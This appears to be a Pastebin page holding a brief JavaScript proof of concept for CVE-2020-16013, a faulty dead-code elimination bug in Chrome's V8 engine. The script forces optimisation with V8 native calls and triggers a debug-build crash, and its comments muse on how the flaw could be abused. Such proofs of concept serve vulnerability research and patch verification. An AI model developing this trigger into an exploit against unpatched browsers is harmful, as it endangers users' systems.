API tools faq
paste
Advertisement
Guest User

PoC CVE-2020-16013

a guest
Jan 6th, 2021
2,182
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 0.70 KB | None | 0 0
raw download clone embed print report
  1. // https://twitter.com/Xoorist
  2. // PoC CVE-2020-16013
  3.  
  4. function foo(x,y,z) {
  5.   let pm = ((x & 2) == y) & ((x & 4) == z);
  6.   let px = ((x & 4) == y) & ((x & 2) == z);
  7.   let b = pm == px;
  8.  
  9.   let obj = new Object();
  10.   // This ends up being considered dead code and removed.
  11.   // Feedback is actually collected in the warmup run, which results in the map of obj being updated
  12.   if (!b) {
  13.     obj.x = 23;
  14.   }
  15.   // We'll always deopt here due to the CheckMaps failure
  16.   // How could one abuse the faulty dead code elimination logic???
  17.   return obj.x;
  18. }
  19.  
  20. %PrepareFunctionForOptimization(foo);
  21. foo(6,2,4);
  22. %OptimizeFunctionOnNextCall(foo);
  23. // Will crash in a debug build(DCHECK)
  24. console.log(foo(6,2,4));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!